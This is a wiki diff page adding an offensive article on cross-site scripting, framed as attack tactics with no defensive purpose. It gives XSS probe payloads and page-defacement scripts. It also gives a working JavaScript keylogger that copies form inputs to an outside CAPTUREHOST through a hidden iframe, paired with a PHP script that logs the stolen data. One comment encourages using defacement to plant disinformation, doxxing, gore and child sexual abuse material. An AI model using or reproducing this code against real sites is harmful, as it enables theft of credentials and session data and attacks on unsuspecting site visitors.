Differences

This shows you the differences between two versions of the page.

--- tactics:xss [2024/06/06 09:46] – created Humphrey Boa-Gart
+++ tactics:xss [2024/08/06 05:48] (current) – external edit 127.0.0.1
@@ Line 1: / Line 1: @@
-{{wst>iw-import}}
+{{wst>iw-cleanup}}
 ====== Cross-Site Scripting (XSS) ======
+Cross site scripting (or XSS) is a method of exploiting a website that does not validate user supplied input or sanitize output. Web servers that fail to do so will allow you to run arbitrary javascript on an end users browser.
-{{tag>Tactics Stubs}}
+===== Entrypoints =====
+XSS entrypoints are usually found in webforms & querystrings. You can test for the existence of xss by using the following string.
+  <script>alert(document.cookie);</script>
+You also may be able to include javascript embedded in a flash object, or an image like so:
+  <img src="javascript:alert(document,cookie);" />
+But this varies between browsers. Another way is like this
+  <a href="javascript:alert(document.cookie);">link</a>
+But this requires your target to click a link
+===== Things To Do =====
+== Hijack user sessions/cookies ==
+Since user session ID and occasionally usernames/passwords are stored in cookies, you can steal cookie data to impersonate a user by either finding their uname/pass or using their server session ID.
+== Log Keystrokes ==
+You can write some code in javascript to send data via ajax/iframes when a user presses a key.
+== Deface pages ==
+If the xss exploit you've discovered is saved into a database and redisplayed to other users, you can deface the page by overlaying content.
+===== Sample Code =====
+<code>
+//---Javascript
+//Overlay a black background with LOL in big white text
+html='<div style="position:absolute;top:0px;left:0px;z-index:99;width:100%;height:100%;background-color:black;"><h1 style="color:#fff;">LOLHAI</h1></div>';
+document.write(html);
+</code>
+<code>
+//---Javascript
+//Change the content of <body>
+html='<h1>LOLHAI</h1>';
+window.document.body.innerHTML=html;
+</code>
+<code>
+//---Javascript
+//You can study the structure of a site and change the content for any element ID or tag name
+html='<h1>LOLHAI</h1>';
+document.getElementById('element_id').innerHTML = html;
+document.getElementsByTagName('element_tag')[child].innerHTML = html;
+//This is epic for trolling by inserting typos, disinformation, dox, gore, cp, etc
+</code>
+<code>
+//---Javascript
+//This is an example of a keylogger. There is also a php file on this article you can use to capture the data.
+randVal = 'loldongs'+(Math.round((10000-5000) * Math.random() + 5000));
+wp='<div style=":display:block;width:0;height:0;z-index:0;overflow:hidden;" id="'+randVal+'"></div>';
+window.onload=function(){
+	window.document.body.innerHTML='<div onkeyup="kl();">'+window.document.body.innerHTML+wp+'</div>';
+}
+function kl(){
+	inp=document.getElementsByTagName('input');
+	qs='';
+	for(var i = 0; i < inp.length; i++){
+		qs=qs+i+'_'+inp[i].name+'='+inp[i].value+'&';
+	}
+	cn=document.getElementById(randVal);
+	kf='<iframe style="width:0;height:0;" src="http://CAPTUREHOST/capture.php?'+qs+'"></iframe>';
+	cn.innerHTML=kf;
+}
+</code>
+<code>
+//---capture.php
+//This will catch all data passed as querystrings and save them in a readable format with IP, referrer & timestamp
+<?php
+	$dumpFile = "dump";
+	$fh = fopen($dumpFile, 'a') or die("can't open file");
+	fwrite($fh, date("m/d/y_g:i:s").'|'.$_SERVER['REMOTE_ADDR'].'|'.$_SERVER['HTTP_REFERER'].'|');
+	foreach($_GET as $qs => $val){
+		fwrite($fh, $qs."=".$val.'|');
+	}
+	fwrite($fh, "\n");
+	fclose($fh);
+?>
+</code>
+{{tag>Tactics}}

User Tools

Site Tools

Differences